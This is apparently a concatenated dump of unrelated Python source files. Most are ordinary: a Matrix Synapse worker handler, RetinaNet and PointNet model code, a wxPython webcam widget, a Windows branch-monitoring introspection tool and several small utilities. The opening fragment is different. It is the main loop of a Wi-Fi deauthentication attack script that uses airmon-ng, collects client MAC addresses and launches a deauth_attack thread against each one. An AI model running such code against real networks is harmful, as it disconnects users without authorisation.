# We define a set, because it can only hold unique values.
active_clients = set()
# We would like to know the threads we've already started so that we don't start multiple threads running the same deauth.
threads_started = []
# Make sure that airmon-ng is running on the correct channel.
subprocess.run(["airmon-ng", "start", wifi_name, hackchannel])
try:
while True:
count = 0
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ["Station MAC", "First time seen", "Last time seen", "Power", "packets", "BSSID", "Probed ESSIDs"]
if ".csv" in file_name and file_name.startswith("clients"):
with open(file_name) as csv_h:
print("Running")
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for index, row in enumerate(csv_reader):
if index < 5:
pass
# We will not add the MAC Addresses we specified at the beginning of the program to the ones we will kick off.
elif row["Station MAC"] in macs_not_to_kick_off:
pass
else:
# Add all the active MAC Addresses.
active_clients.add(row["Station MAC"])
print("Station MAC |")
print("______________________|")
for item in active_clients:
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
print(f"{item}")
# Once a device is in the active clients set and not one of the threads running deauth attacks we start a new thread as a deauth attack.
if item not in threads_started:
# It's easier to work with the unique MAC Addresses in a list and add the MAC to the list of threads we started before we start running the deauth thread.
threads_started.append(item)
# We run the deauth_attack function in the thread with the argumenets hackbssid, item and wifi_name, we also specify it as a background daemon thread.
# A daemon thread keeps running until the main thread stops. You can stop the main thread with ctrl + c.
t = threading.Thread(target=deauth_attack, args=[hackbssid, item, wifi_name], daemon=True)
t.start()
except KeyboardInterrupt:
print("\nStopping Deauth")
# Set the network interface controller back into managed mode and restart network services.
set_into_managed_mode(wifi_name)
|
api/base/views/__init__.py | simpsonw/atmosphere | 197 | 17709 | from .version import VersionViewSet, DeployVersionViewSet
__all__ = ["VersionViewSet", "DeployVersionViewSet"]
|
amaranth/vendor/xilinx_spartan_3_6.py | psumesh/nmigen | 528 | 17710 | <reponame>psumesh/nmigen<filename>amaranth/vendor/xilinx_spartan_3_6.py
import warnings
from .xilinx import XilinxPlatform
__all__ = ["XilinxSpartan3APlatform", "XilinxSpartan6Platform"]
XilinxSpartan3APlatform = XilinxPlatform
XilinxSpartan6Platform = XilinxPlatform
# TODO(amaranth-0.4): remove
warnings.warn("instead of amaranth.vendor.xilinx_spartan_3_6.XilinxSpartan3APlatform and "
".XilinxSpartan6Platform, use amaranth.vendor.xilinx.XilinxPlatform",
DeprecationWarning, stacklevel=2)
|
synapse/handlers/room_member_worker.py | lukaslihotzki/synapse | 9,945 | 17771 | # Copyright 2018-2021 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import TYPE_CHECKING, List, Optional, Tuple
from synapse.api.errors import SynapseError
from synapse.handlers.room_member import RoomMemberHandler
from synapse.replication.http.membership import (
ReplicationRemoteJoinRestServlet as ReplRemoteJoin,
ReplicationRemoteKnockRestServlet as ReplRemoteKnock,
ReplicationRemoteRejectInviteRestServlet as ReplRejectInvite,
ReplicationRemoteRescindKnockRestServlet as ReplRescindKnock,
ReplicationUserJoinedLeftRoomRestServlet as ReplJoinedLeft,
)
from synapse.types import JsonDict, Requester, UserID
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
class RoomMemberWorkerHandler(RoomMemberHandler):
def __init__(self, hs: "HomeServer"):
super().__init__(hs)
self._remote_join_client = ReplRemoteJoin.make_client(hs)
self._remote_knock_client = ReplRemoteKnock.make_client(hs)
self._remote_reject_client = ReplRejectInvite.make_client(hs)
self._remote_rescind_client = ReplRescindKnock.make_client(hs)
self._notify_change_client = ReplJoinedLeft.make_client(hs)
async def _remote_join(
self,
requester: Requester,
remote_room_hosts: List[str],
room_id: str,
user: UserID,
content: dict,
) -> Tuple[str, int]:
"""Implements RoomMemberHandler._remote_join"""
if len(remote_room_hosts) == 0:
raise SynapseError(404, "No known servers")
ret = await self._remote_join_client(
requester=requester,
remote_room_hosts=remote_room_hosts,
room_id=room_id,
user_id=user.to_string(),
content=content,
)
return ret["event_id"], ret["stream_id"]
async def remote_reject_invite(
self,
invite_event_id: str,
txn_id: Optional[str],
requester: Requester,
content: dict,
) -> Tuple[str, int]:
"""
Rejects an out-of-band invite received from a remote user
Implements RoomMemberHandler.remote_reject_invite
"""
ret = await self._remote_reject_client(
invite_event_id=invite_event_id,
txn_id=txn_id,
requester=requester,
content=content,
)
return ret["event_id"], ret["stream_id"]
async def remote_rescind_knock(
self,
knock_event_id: str,
txn_id: Optional[str],
requester: Requester,
content: JsonDict,
) -> Tuple[str, int]:
"""
Rescinds a local knock made on a remote room
Args:
knock_event_id: the knock event
txn_id: optional transaction ID supplied by the client
requester: user making the request, according to the access token
content: additional content to include in the leave event.
Normally an empty dict.
Returns:
A tuple containing (event_id, stream_id of the leave event)
"""
ret = await self._remote_rescind_client(
knock_event_id=knock_event_id,
txn_id=txn_id,
requester=requester,
content=content,
)
return ret["event_id"], ret["stream_id"]
async def remote_knock(
self,
remote_room_hosts: List[str],
room_id: str,
user: UserID,
content: dict,
) -> Tuple[str, int]:
"""Sends a knock to a room.
Implements RoomMemberHandler.remote_knock
"""
ret = await self._remote_knock_client(
remote_room_hosts=remote_room_hosts,
room_id=room_id,
user=user,
content=content,
)
return ret["event_id"], ret["stream_id"]
async def _user_left_room(self, target: UserID, room_id: str) -> None:
"""Implements RoomMemberHandler._user_left_room"""
await self._notify_change_client(
user_id=target.to_string(), room_id=room_id, change="left"
)
async def forget(self, target: UserID, room_id: str) -> None:
raise RuntimeError("Cannot forget rooms on workers.")
|
object_detection/det_heads/retinaNet_head/retinanet_head.py | no-name-xiaosheng/PaddleViT | 993 | 17796 | <reponame>no-name-xiaosheng/PaddleViT<gh_stars>100-1000
# Copyright (c) 2021 PPViT Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import paddle
import paddle.nn as nn
from paddle.nn.initializer import Normal, Constant
from retinanet_loss import RetinaNetLoss
from post_process import RetinaNetPostProcess
from det_utils.generator_utils import AnchorGenerator
class RetinaNetHead(nn.Layer):
'''
The head used in RetinaNet for object classification and box regression.
It has two subnets for the two tasks, with a common structure but separate parameters.
'''
def __init__(self, config):
'''
Args:
input_shape (List[ShapeSpec]): input shape.
num_classes (int): number of classes. Used to label background proposals.
num_anchors (int): number of generated anchors.
conv_dims (List[int]): dimensions for each convolution layer.
norm (str or callable):
Normalization for conv layers except for the two output layers.
See :func:`detectron2.layers.get_norm` for supported types.
loss_func (class): the class is used to compute loss.
prior_prob (float): Prior weight for computing bias.
'''
super(RetinaNetHead, self).__init__()
num_convs = config.RETINANET.NUM_CONVS
input_channels = config.RETINANET.INPUT_CHANNELS
norm = config.RETINANET.NORM
prior_prob = config.RETINANET.PRIOR_PROB
self.num_classes = config.RETINANET.NUM_CLASSES
self.get_loss = RetinaNetLoss(
focal_loss_alpha=config.RETINANET.FOCAL_LOSS_ALPHA,
focal_loss_gamma=config.RETINANET.FOCAL_LOSS_GAMMA,
smoothl1_loss_delta=config.RETINANET.SMOOTHL1_LOSS_DELTA,
positive_thresh=config.RETINANET.POSITIVE_THRESH,
negative_thresh=config.RETINANET.NEGATIVE_THRESH,
allow_low_quality=config.RETINANET.ALLOW_LOW_QUALITY,
num_classes=config.RETINANET.NUM_CLASSES,
weights=config.RETINANET.WEIGHTS
)
self.postprocess = RetinaNetPostProcess(
score_threshold=config.RETINANET.SCORE_THRESH,
keep_top_k=config.RETINANET.KEEP_TOPK,
nms_top_k=config.RETINANET.NMS_TOPK,
nms_threshold=config.RETINANET.NMS_THRESH,
bbox_reg_weights=config.RETINANET.WEIGHTS
)
self.anchor_generator = AnchorGenerator(anchor_sizes=config.RETINANET.ANCHOR_SIZE,
aspect_ratios=config.RETINANET.ASPECT_RATIOS,
strides=config.RETINANET.STRIDES,
offset=config.RETINANET.OFFSET)
num_anchors = self.anchor_generator.num_anchors
conv_dims = [input_channels] * num_convs
cls_net = []
reg_net = []
for in_channels, out_channels in zip(
[input_channels] + list(conv_dims), conv_dims
):
cls_net.append(
nn.Conv2D(in_channels, out_channels, kernel_size=3, stride=1, padding=1,
weight_attr=paddle.ParamAttr(initializer=Normal(mean=0., std=0.01)))
)
if norm == "bn":
cls_net.append(nn.BatchNorm2D(out_channels))
cls_net.append(nn.ReLU())
reg_net.append(
nn.Conv2D(in_channels, out_channels, kernel_size=3, stride=1, padding=1,
weight_attr=paddle.ParamAttr(initializer=Normal(mean=0., std=0.01)))
)
if norm == "bn":
reg_net.append(nn.BatchNorm2D(out_channels))
reg_net.append(nn.ReLU())
self.cls_net = nn.Sequential(*cls_net)
self.reg_net = nn.Sequential(*reg_net)
bias_value = -math.log((1 - prior_prob) / prior_prob)
self.cls_score = nn.Conv2D(
conv_dims[-1], num_anchors * self.num_classes, kernel_size=3, stride=1, padding=1,
weight_attr=paddle.ParamAttr(initializer=Normal(mean=0., std=0.01)),
bias_attr=paddle.ParamAttr(initializer=Constant(bias_value))
)
self.bbox_pred = nn.Conv2D(
conv_dims[-1], num_anchors * 4, kernel_size=3, stride=1, padding=1,
weight_attr=paddle.ParamAttr(initializer=Normal(mean=0., std=0.01))
)
def forward(self, feats, inputs):
'''
Returns:
loss_dict (dict) | pred_result(tensor), bbox_num(tensor):
loss_dict: contains cls_losses and reg_losses.
pred_result: the shape is [M, 6], M is the number of final preds,
Each row has 6 values: [label, score, xmin, ymin, xmax, ymax]
bbox_num: the shape is [N], N is the num of batch_size,
bbox_num[i] means the i'th img have bbox_num[i] boxes.
'''
anchors = self.anchor_generator(feats)
pred_scores = []
pred_boxes = []
for feat in feats:
pred_scores.append(self.cls_score(self.cls_net(feat)))
pred_boxes.append(self.bbox_pred(self.reg_net(feat)))
pred_scores_list = [
transpose_to_bs_hwa_k(s, self.num_classes) for s in pred_scores
]
pred_boxes_list = [
transpose_to_bs_hwa_k(s, 4) for s in pred_boxes
]
if self.training:
anchors = paddle.concat(anchors)
loss_dict = self.get_loss(anchors, [pred_scores_list, pred_boxes_list], inputs)
return loss_dict
else:
img_whwh = paddle.concat([inputs["imgs_shape"][:, 1:2],
inputs["imgs_shape"][:, 0:1]], axis=-1)
pred_result, bbox_num = self.postprocess(
pred_scores_list,
pred_boxes_list,
anchors,
inputs["scale_factor_wh"],
img_whwh
)
return pred_result, bbox_num
def transpose_to_bs_hwa_k(tensor, k):
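    # Reshape a head output from (bs, num_anchors * k, h, w) to
    # (bs, h * w * num_anchors, k) so that predictions line up with the
    # flattened anchor ordering.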
assert tensor.dim() == 4
bs, _, h, w = tensor.shape
tensor = tensor.reshape([bs, -1, k, h, w])
tensor = tensor.transpose([0, 3, 4, 1, 2])
return tensor.reshape([bs, -1, k])
|
OcCo_Torch/models/pointnet_util.py | sun-pyo/OcCo | 158 | 17814 | <reponame>sun-pyo/OcCo
# Copyright (c) 2020. <NAME>, <EMAIL>
# Ref: https://github.com/fxia22/pointnet.pytorch/pointnet/model.py
import torch, torch.nn as nn, numpy as np, torch.nn.functional as F
from torch.autograd import Variable
def feature_transform_regularizer(trans):
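    # PointNet's feature-transform regularizer: keep the predicted transform A
    # close to an orthogonal matrix by penalizing ||A A^T - I||.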
d = trans.size()[1]
I = torch.eye(d)[None, :, :]
if trans.is_cuda:
I = I.cuda()
    loss = torch.mean(torch.norm(torch.bmm(trans, trans.transpose(2, 1)) - I, dim=(1, 2)))
return loss
# STN -> Spatial Transformer Network
class STN3d(nn.Module):
def __init__(self, channel):
super(STN3d, self).__init__()
self.conv1 = nn.Conv1d(channel, 64, 1) # in-channel, out-channel, kernel size
self.conv2 = nn.Conv1d(64, 128, 1)
self.conv3 = nn.Conv1d(128, 1024, 1)
self.fc1 = nn.Linear(1024, 512)
self.fc2 = nn.Linear(512, 256)
self.fc3 = nn.Linear(256, 9)
self.relu = nn.ReLU()
self.bn1 = nn.BatchNorm1d(64)
self.bn2 = nn.BatchNorm1d(128)
self.bn3 = nn.BatchNorm1d(1024)
self.bn4 = nn.BatchNorm1d(512)
self.bn5 = nn.BatchNorm1d(256)
def forward(self, x):
B = x.size()[0]
x = F.relu(self.bn1(self.conv1(x)))
x = F.relu(self.bn2(self.conv2(x)))
x = F.relu(self.bn3(self.conv3(x)))
x = torch.max(x, 2, keepdim=False)[0] # global descriptors
x = F.relu(self.bn4(self.fc1(x)))
x = F.relu(self.bn5(self.fc2(x)))
x = self.fc3(x)
iden = Variable(torch.from_numpy(np.eye(3).flatten().astype(np.float32))).view(1, 9).repeat(B, 1)
if x.is_cuda:
iden = iden.cuda()
x = x + iden
x = x.view(-1, 3, 3)
return x
class STNkd(nn.Module):
def __init__(self, k=64):
super(STNkd, self).__init__()
self.conv1 = nn.Conv1d(k, 64, 1)
self.conv2 = nn.Conv1d(64, 128, 1)
self.conv3 = nn.Conv1d(128, 1024, 1)
self.fc1 = nn.Linear(1024, 512)
self.fc2 = nn.Linear(512, 256)
self.fc3 = nn.Linear(256, k * k)
self.relu = nn.ReLU()
self.bn1 = nn.BatchNorm1d(64)
self.bn2 = nn.BatchNorm1d(128)
self.bn3 = nn.BatchNorm1d(1024)
self.bn4 = nn.BatchNorm1d(512)
self.bn5 = nn.BatchNorm1d(256)
self.k = k
def forward(self, x):
B = x.size()[0]
x = F.relu(self.bn1(self.conv1(x)))
x = F.relu(self.bn2(self.conv2(x)))
x = F.relu(self.bn3(self.conv3(x)))
x = torch.max(x, 2, keepdim=False)[0]
x = F.relu(self.bn4(self.fc1(x)))
x = F.relu(self.bn5(self.fc2(x)))
x = self.fc3(x)
iden = Variable(torch.from_numpy(np.eye(self.k).flatten().astype(np.float32))).view(
1, self.k ** 2).repeat(B, 1)
if x.is_cuda:
iden = iden.cuda()
x = x + iden
x = x.view(-1, self.k, self.k)
return x
class PointNetEncoder(nn.Module):
def __init__(self, global_feat=True, feature_transform=False,
channel=3, detailed=False):
        # when the input includes normals, channel is 6 (xyz + normals) instead of 3
super(PointNetEncoder, self).__init__()
self.stn = STN3d(channel) # Batch * 3 * 3
self.conv1 = nn.Conv1d(channel, 64, 1)
self.conv2 = nn.Conv1d(64, 128, 1)
self.conv3 = nn.Conv1d(128, 1024, 1)
self.bn1 = nn.BatchNorm1d(64)
self.bn2 = nn.BatchNorm1d(128)
self.bn3 = nn.BatchNorm1d(1024)
self.global_feat = global_feat
self.feature_transform = feature_transform
if self.feature_transform:
self.fstn = STNkd(k=64)
self.detailed = detailed
def forward(self, x):
_, D, N = x.size() # Batch Size, Dimension of Point Features, Num of Points
trans = self.stn(x)
x = x.transpose(2, 1)
if D > 3:
# pdb.set_trace()
x, feature = x.split([3, D-3], dim=2)
x = torch.bmm(x, trans)
# feature = torch.bmm(feature, trans) # feature -> normals
if D > 3:
x = torch.cat([x, feature], dim=2)
x = x.transpose(2, 1)
out1 = self.bn1(self.conv1(x))
x = F.relu(out1)
if self.feature_transform:
trans_feat = self.fstn(x)
x = x.transpose(2, 1)
x = torch.bmm(x, trans_feat)
x = x.transpose(2, 1)
else:
trans_feat = None
pointfeat = x
out2 = self.bn2(self.conv2(x))
x = F.relu(out2)
out3 = self.bn3(self.conv3(x))
# x = self.bn3(self.conv3(x))
x = torch.max(out3, 2, keepdim=False)[0]
if self.global_feat:
return x, trans, trans_feat
elif self.detailed:
return out1, out2, out3, x
else: # concatenate global and local feature together
x = x.view(-1, 1024, 1).repeat(1, 1, N)
return torch.cat([x, pointfeat], 1), trans, trans_feat
class PointNetPartSegEncoder(nn.Module):
def __init__(self, feature_transform=True, channel=3):
super(PointNetPartSegEncoder, self).__init__()
self.stn = STN3d(channel)
self.conv1 = nn.Conv1d(channel, 64, 1)
self.conv2 = nn.Conv1d(64, 128, 1)
self.conv3 = nn.Conv1d(128, 128, 1)
self.conv4 = nn.Conv1d(128, 512, 1)
self.conv5 = nn.Conv1d(512, 2048, 1)
self.bn1 = nn.BatchNorm1d(64)
self.bn2 = nn.BatchNorm1d(128)
self.bn3 = nn.BatchNorm1d(128)
self.bn4 = nn.BatchNorm1d(512)
self.bn5 = nn.BatchNorm1d(2048)
self.feature_transform = feature_transform
if self.feature_transform:
self.fstn = STNkd(k=128)
def forward(self, point_cloud, label):
B, D, N = point_cloud.size()
trans = self.stn(point_cloud)
point_cloud = point_cloud.transpose(2, 1)
if D > 3:
point_cloud, feature = point_cloud.split(3, dim=2)
point_cloud = torch.bmm(point_cloud, trans)
if D > 3:
point_cloud = torch.cat([point_cloud, feature], dim=2)
point_cloud = point_cloud.transpose(2, 1)
out1 = F.relu(self.bn1(self.conv1(point_cloud)))
out2 = F.relu(self.bn2(self.conv2(out1)))
out3 = F.relu(self.bn3(self.conv3(out2)))
if self.feature_transform:
trans_feat = self.fstn(out3)
net_transformed = torch.bmm(out3.transpose(2, 1), trans_feat)
out3 = net_transformed.transpose(2, 1)
out4 = F.relu(self.bn4(self.conv4(out3)))
out5 = self.bn5(self.conv5(out4))
out_max = torch.max(out5, 2, keepdim=False)[0]
out_max = torch.cat([out_max, label.squeeze(1)], 1)
expand = out_max.view(-1, 2048 + 16, 1).repeat(1, 1, N)
concat = torch.cat([expand, out1, out2, out3, out4, out5], 1)
if self.feature_transform:
return concat, trans_feat
return concat
class encoder(nn.Module):
def __init__(self, num_channel=3, **kwargs):
super(encoder, self).__init__()
self.feat = PointNetEncoder(global_feat=True, channel=num_channel)
def forward(self, x):
feat, _, _ = self.feat(x)
return feat
class detailed_encoder(nn.Module):
def __init__(self, num_channel=3, **kwargs):
super(detailed_encoder, self).__init__()
self.feat = PointNetEncoder(global_feat=False,
channel=num_channel,
detailed=True)
def forward(self, x):
out1, out2, out3, x = self.feat(x)
return out1, out2, out3, x |
Kernel/kernel.py | y11en/BranchMonitoringProject | 122 | 17838 | <filename>Kernel/kernel.py
# Kernel introspection module to enrich branch collected data
# This code is part of BranchMonitoring framework
# Written by: <NAME> - 2017
# Federal University of Parana (UFPR)
from xml.etree.ElementTree import ElementTree # Parse XML
import subprocess # Run dump tools
import win32file as w # Use windows API
import time # Wait for data
import signal # Interrupt endless loop
# Monitoring class - retrieves branch data
class Monitor():
# class instantiation
def __init__(self,save=None):
self.save=save
self.mods = None # No introspection data at this point
signal.signal(signal.SIGINT,self.signal_handler) # Installing signal handler
# debug print
if __debug__:
print("Starting Monitor")
# open driver handle
def __open_driver_handler(self):
self.hdevice=w.CreateFile("\\\\.\\BranchMonitor",0x80000000|0x40000000,0,None,3,0x00000080,None)
# close driver handle
def __close_driver_handler(self):
w.CloseHandle(self.hdevice)
# get branch data from driver handle
def __get_branch_data(self):
# read bytes and string itself
tam,string = w.ReadFile(self.hdevice,200,None)
# if no data, return
if len(string)==0:
return None
# case having data
else:
# interpret string as hex address
branch=int(string[8:15][::-1].encode('hex'),16)
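            # Note: str.encode('hex') is Python 2 only; on Python 3 the equivalent
            # would be int(string[8:15][::-1].hex(), 16) (an assumption, untested here).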
return branch
# signal handler
def signal_handler(self,signal,frame):
self.run=False
# get offset from a given function address
# mod: module to look into
# offset: offset to look for
def offset_to_func(self,mod,offset):
# get pointer to given module
funcs = self.exports[mod]
# default: no offset found
last_offset = 0
last_fname = "Unknown"
# search whole exported symbols
for f in funcs:
name = f[0] # function name
addr = f[1] # function offset
rel_addr = f[2] # relative function offset
# if we are looking for such offset
if offset == addr or offset == rel_addr:
# immediately returns
return name
# in case of a jump inside a given function
# consider the closest exported symbol
if offset > addr and addr > last_offset:
last_offset = addr
last_fname = name
# return "unknown" or the closest symbol
return last_fname
# identifies to which module a given address refers
def addr_to_module(self,branch):
# consider only the meaningful bytes
branch = branch & 0xFFFFFFFF
# look into all loaded modules
for m in self.mods:
            start_addr = self.mods[m][0] # lowest addr
            end_addr = self.mods[m][1] # highest addr
# if branch is inside
if branch >= start_addr and branch <= end_addr:
# if there are exported symbols, dig into it
if(self.exports is not None):
# return base_module+function_at_offset
return m+"+"+self.offset_to_func(m,branch-start_addr)
# otherwise, return just the name
return m
# nothing found
return "Unknown"
# polling loop
def loop(self,mods=None,exports=None,save=False):
if save:
log = open(self.save,"w")
# default definitions
last = ""
self.mods = mods
self.exports = exports
self.run = True
# debug print
if __debug__:
print("Starting looping")
# open handler
self.__open_driver_handler()
try:
# infinite loop
while(self.run):
# try to get a branch tuple
branch=self.__get_branch_data()
# check if got
if branch is not None:
# no introspection, just print
if self.mods is None:
print("%x" % branch)
else:
# if there's introspection data, dig into it
module_string = self.addr_to_module(branch)
# do not print repeated entries
if module_string != last:
s = "%x <%s>" % (branch,module_string)
print(s)
if save:
log.write(s+"\n")
last = module_string
else:
# no data, sleep
time.sleep(1)
# signal received
finally:
# cleanup
if save:
log.close()
self.__close_driver_handler()
# Dumper: the introspection class
class Dumper():
# instantiation
def __init__(self):
# set parser configs
self.parse()
# set parser configs
def parse(self):
# External tools are required
# DriverView used to enumerate modules
# DriverView binary path
self.drvview_path = "driverview-x64\DriverView.exe"
# DriverView Output file
self.drvview_output = "driverview-x64\drv.xml"
# DllView used to map function to offsets
# DllView binary path
self.dllview_path = "dllexp-x64\dllexp.exe"
# DllView output
self.dllview_output = "Downloads\dllexp-x64\dll.xml"
# enumerate loaded modules
def dump_modules(self):
if __debug__:
print("Dumping Modules")
# using DriverView
s = subprocess.Popen([self.drvview_path,"/sxml",self.drvview_output])
s.wait()
# get offsets
def dump_exports(self,bin):
# using DllView
s = subprocess.Popen([self.dllview_path,"/from_files",bin,"/sxml",self.dllview_output])
s.wait()
# parse exported symbols
def parse_exports(self):
exp = []
self.dtree = ElementTree()
self.dtree.parse(self.dllview_output)
for p in self.dtree.findall("item"):
# get function name
fname = p.find('function_name').text
# try to get address
try:
# address
addr = int(p.find('address').text,16)
except:
# error, no meaningful address
addr = 0xFFFFFFFF
# also get relative addr
rel_addr = int(p.find('relative_address').text,16)
# add tuple to list
exp.append((fname,addr,rel_addr))
# return list
return exp
# get offsets and parse
def get_exports(self,bin):
if __debug__:
print("Getting Exports for: %s" % bin)
self.dump_exports(bin)
return self.parse_exports()
# parse loaded modules/drivers
def parse_modules(self):
mods = dict()
exports = dict()
self.dtree = ElementTree()
self.dtree.parse(self.drvview_output)
for p in self.dtree.findall("item"):
# module name
mod_name = p.find('driver_name').text
# initial addr
mod_addr = int(p.find('address').text.replace("`",""),16)
# end addr
mod_end_addr = int(p.find('end_address').text.replace("`",""),16)
# add to dict - no repeated modules
mods[mod_name]=(mod_addr,mod_end_addr)
# try to get exports for the module
# returns a list
exp = self.get_exports(p.find('filename').text)
# map module to export list
exports[mod_name] = exp
# return module dict and exports dict
return mods, exports
# "main"
if __name__ == '__main__':
# introspect first
d = Dumper()
d.dump_modules()
mods, exports = d.parse_modules()
# then monitor
m=Monitor(save="save.log")
# infinite loop
# introspected data as parameter to the monitor
m.loop(mods,exports,True)
# no module import
else:
print("No module import support yet!")
|
cv2/wxPython-CV-widget/main.py | whitmans-max/python-examples | 140 | 17843 | import wx
import cv2
#----------------------------------------------------------------------
# Panel to display image from camera
#----------------------------------------------------------------------
class WebcamPanel(wx.Window): # wx.Panel, wx.Control
def __init__(self, parent, camera, fps=15, flip=False):
wx.Window.__init__(self, parent)
# remember arguments
self.camera = camera
self.fps = fps
self.flip = flip
# get frame size
ret_value, frame = self.camera.read()
height, width = frame.shape[:2]
# resize panel with camera image
self.SetSize( (width, height) )
#self.SetMinSize( (width, height) )
# resize main window
        self.GetParent().GetParent().SetSize( (width, height+37) ) # needs a fix so the +37 offset is not required
#self.GetGrandParent().SetSize( (width, height+25) )
#self.GetTopLevelParent().SetSize( (width, height+25) ) # wrong parent
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
if self.flip:
frame = cv2.flip(frame, 1)
# create bitmap with frame
self.bmp = wx.BitmapFromBuffer(width, height, frame)
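        # Note (assumption about the wx version in use): on wxPython 4 (Phoenix)
        # the equivalent call is wx.Bitmap.FromBuffer(width, height, frame), and
        # the Timer.Start call below expects an int number of milliseconds.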
# timer to refresh frames
self.timer = wx.Timer(self)
self.timer.Start(1000./fps)
# add functions to events
self.Bind(wx.EVT_PAINT, self.OnPaint) # run when it is needed
self.Bind(wx.EVT_TIMER, self.NextFrame) # run by timer
def OnPaint(self, event):
dc = wx.BufferedPaintDC(self)
dc.DrawBitmap(self.bmp, 0, 0)
def NextFrame(self, event):
ret_value, frame = self.camera.read()
if ret_value:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
if self.flip:
frame = cv2.flip(frame, 1)
self.bmp.CopyFromBuffer(frame)
self.Refresh()
#----------------------------------------------------------------------
# Main Window
#----------------------------------------------------------------------
class MainWindow(wx.Frame):
def __init__(self, camera, fps=10):
wx.Frame.__init__(self, None)
self.panel = wx.Panel(self, -1)
# add sizer
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.panel.SetSizer(self.sizer)
# add button
self.button = wx.Button(self.panel, label="CAPTURE")
self.button.Bind(wx.EVT_BUTTON, self.OnButton)
self.sizer.Add(self.button, 0, wx.EXPAND)
# add panel with webcam image
self.webcampanel = WebcamPanel(self.panel, camera)
self.sizer.Add(self.webcampanel, 1, wx.EXPAND)
#self.sizer.Layout()
#self.webcampanel.Layout()
#self.Fit()
self.Show()
def OnButton(self, event):
print("TODO: save image in file")
#----------------------------------------------------------------------
camera = cv2.VideoCapture(0)
app = wx.App()
MainWindow(camera)
app.MainLoop()
|
datapackage_pipelines/generators/utilities.py | gperonato/datapackage-pipelines | 109 | 17848 | def arg_to_step(arg):
if isinstance(arg, str):
return {'run': arg}
else:
return dict(zip(['run', 'parameters', 'cache'], arg))
def steps(*args):
return [arg_to_step(arg) for arg in args]
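# Illustrative use (the step names below are assumptions, not taken from this file):
#   steps('load_metadata', ('load_resource', {'url': 'data.csv'}, True))
# would return:
#   [{'run': 'load_metadata'},
#    {'run': 'load_resource', 'parameters': {'url': 'data.csv'}, 'cache': True}]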
|
src/UQpy/Distributions/baseclass/DistributionContinuous1D.py | marrov/UQpy | 132 | 17858 | import numpy as np
import scipy.stats as stats
from UQpy.Distributions.baseclass.Distribution import Distribution
class DistributionContinuous1D(Distribution):
"""
Parent class for univariate continuous probability distributions.
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
@staticmethod
def _check_x_dimension(x):
"""
Check the dimension of input x - must be an ndarray of shape (npoints,) or (npoints, 1)
"""
x = np.atleast_1d(x)
if len(x.shape) > 2 or (len(x.shape) == 2 and x.shape[1] != 1):
raise ValueError('Wrong dimension in x.')
return x.reshape((-1,))
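    # Illustrative subclass (a sketch, not part of this file): a concrete 1D
    # distribution typically forwards its parameters to the matching scipy.stats
    # object, e.g.
    #   class Normal(DistributionContinuous1D):
    #       def __init__(self, loc=0., scale=1.):
    #           super().__init__(loc=loc, scale=scale, order_params=['loc', 'scale'])
    #           self._construct_from_scipy(scipy_name=stats.norm)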
def _construct_from_scipy(self, scipy_name=stats.rv_continuous):
self.cdf = lambda x: scipy_name.cdf(x=self._check_x_dimension(x), **self.params)
self.pdf = lambda x: scipy_name.pdf(x=self._check_x_dimension(x), **self.params)
self.log_pdf = lambda x: scipy_name.logpdf(x=self._check_x_dimension(x), **self.params)
self.icdf = lambda x: scipy_name.ppf(q=self._check_x_dimension(x), **self.params)
self.moments = lambda moments2return='mvsk': scipy_name.stats(moments=moments2return, **self.params)
self.rvs = lambda nsamples=1, random_state=None: scipy_name.rvs(
size=nsamples, random_state=random_state, **self.params).reshape((nsamples, 1))
def tmp_fit(dist, data):
data = self._check_x_dimension(data)
fixed_params = {}
for key, value in dist.params.items():
if value is not None:
fixed_params['f' + key] = value
params_fitted = scipy_name.fit(data=data, **fixed_params)
return dict(zip(dist.order_params, params_fitted))
self.fit = lambda data: tmp_fit(self, data) |
malaya_speech/supervised/unet.py | ishine/malaya-speech | 111 | 17881 | from malaya_speech.utils import (
check_file,
load_graph,
generate_session,
nodes_session,
)
from malaya_speech.model.tf import UNET, UNETSTFT, UNET1D
def load(model, module, quantized=False, **kwargs):
path = check_file(
file=model,
module=module,
keys={'model': 'model.pb'},
quantized=quantized,
**kwargs,
)
g = load_graph(path['model'], **kwargs)
inputs = ['Placeholder']
outputs = ['logits']
input_nodes, output_nodes = nodes_session(g, inputs, outputs)
return UNET(
input_nodes=input_nodes,
output_nodes=output_nodes,
sess=generate_session(graph=g, **kwargs),
model=model,
name=module,
)
def load_stft(model, module, instruments, quantized=False, **kwargs):
path = check_file(
file=model,
module=module,
keys={'model': 'model.pb'},
quantized=quantized,
**kwargs,
)
g = load_graph(path['model'], **kwargs)
inputs = ['Placeholder']
outputs = [f'logits_{i}' for i in range(len(instruments))]
input_nodes, output_nodes = nodes_session(g, inputs, outputs)
return UNETSTFT(
input_nodes=input_nodes,
output_nodes=output_nodes,
instruments=instruments,
sess=generate_session(graph=g, **kwargs),
model=model,
name=module,
)
def load_1d(model, module, quantized=False, **kwargs):
path = check_file(
file=model,
module=module,
keys={'model': 'model.pb'},
